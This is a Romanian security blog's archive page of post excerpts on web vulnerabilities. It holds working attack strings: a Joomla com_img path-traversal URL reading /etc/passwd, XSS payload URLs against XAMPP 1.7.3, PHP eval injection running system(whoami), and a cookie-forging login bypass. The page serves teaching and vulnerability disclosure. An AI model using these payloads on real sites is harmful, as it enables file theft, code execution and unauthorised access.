Arhiva | Securitatea retelelor RSS pentru aceasta categorie
Despre Cross Site Scripting (XSS) - Securitatea Informatica

Despre Cross Site Scripting (XSS)

1. Cuvânt înainte Acest articol este dedicat unei vulnerabilităţi web numită Cross Site Scripting. Exemplele întâlnite pe parcursul articolului sunt create în Cascading Style Sheet (CSS), HyperText Markup Language (HTML), Hypertext Preprocessor (PHP), JavaScript (JS) şi Visual Basic Script (VBScript). 2. Definiţie Cross Site Scripting (prescurtat XSS) este o vulnerabilitate web ce permite utilizatorului să [...]

Citeşte mai mult
Joomla com_img – Local File Inclusion - Securitatea Informatica

Joomla com_img – Local File Inclusion

Data: 10 noiembrie 2010 Descriere: Vulnerabilitate LFI (includere de fisier local) in componenta Joomla com_img. Exploit: http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00

Citeşte mai mult
Vulnerabilitati PHP – Remote Command Execution - Securitatea Informatica

Vulnerabilitati PHP – Remote Command Execution

Sfaturi : Dacă un script foloseşte exec() nu vom putea vedea rezultatul comenzii (dar comanda este executată) până când rezultatul nu este printat din script. Putem folosii operatorul OR ( || ) dacă scriptul execută mai mult de o comandă. În PHP există câteva comenzi prin intermediul cărora putem executa comenzi: exec — Execută un [...]

Citeşte mai mult
Xampp 1.7.3 – vulnerabilitati multiple - Securitatea Informatica

Xampp 1.7.3 – vulnerabilitati multiple

Data: 6 noiembrie 2010 Descriere: XAMPP este o distribuţie Apache care conţin MySQL, PHP şi Perl. Vulnerabilitati: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script> Aparare: Producatorul ar trebui să filtreze caracterele speciale din formulare. Clienţii ar trebui să stabilească parola de acces la XAMPP folder.

Citeşte mai mult
Vulnerabilitati PHP –  Remote Code Execution - Securitatea Informatica

Vulnerabilitati PHP – Remote Code Execution

Exemplu de bază Cod: <?php $code=$_GET['code']; eval($code); ?> Funcţia “eval” evaluează un string ca şi cod PHP. În acest caz, putem executa cod PHP. Exemplu : http://127.0.0.1/test.php?code=phpinfo(); http://127.0.0.1/test.php?code=system(whoami); Şi vom obţine rezultatul codului PHP injectat de către noi. Exemplu simplu Cod: $conf = array_merge($conf,$confweb); } @eval(stripslashes($_REQUEST['anticode'])); if ( $_SERVER['HTTP_CLIENT_IP'] ) Putem vedea că valoarea variabilei ”anticode” este cerută prin metoda [...]

Citeşte mai mult
Vulnerabilitati PHP –  Insecure Cooke Handling - Securitatea Informatica

Vulnerabilitati PHP – Insecure Cooke Handling

Scrie codul în URL-bar, nu utiliza un cookie editor pentru asta. Exemplu de bază Cod: <?php if($_POST['password'] == $thepass) { setcookie(“is_user_logged”,”1″); } else { die(“Login failed!”); } //………… etc …………….. if($_COOKIE['is_user_logged']==”1″) include ”admin.php”; else die(‘not logged’); ?> Ceva interesant aici. Dacă atribuim valoarea “1″ variabilei “is_user_logged” salvată în cookie vom fi logaţi. Exemplu: javascript:document.cookie = “is_user_logged=1; path=/”; Suntem logaţi, trecem de verificare [...]

Citeşte mai mult
Pagina 5 din 8« Prima...34567...Ultima »
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro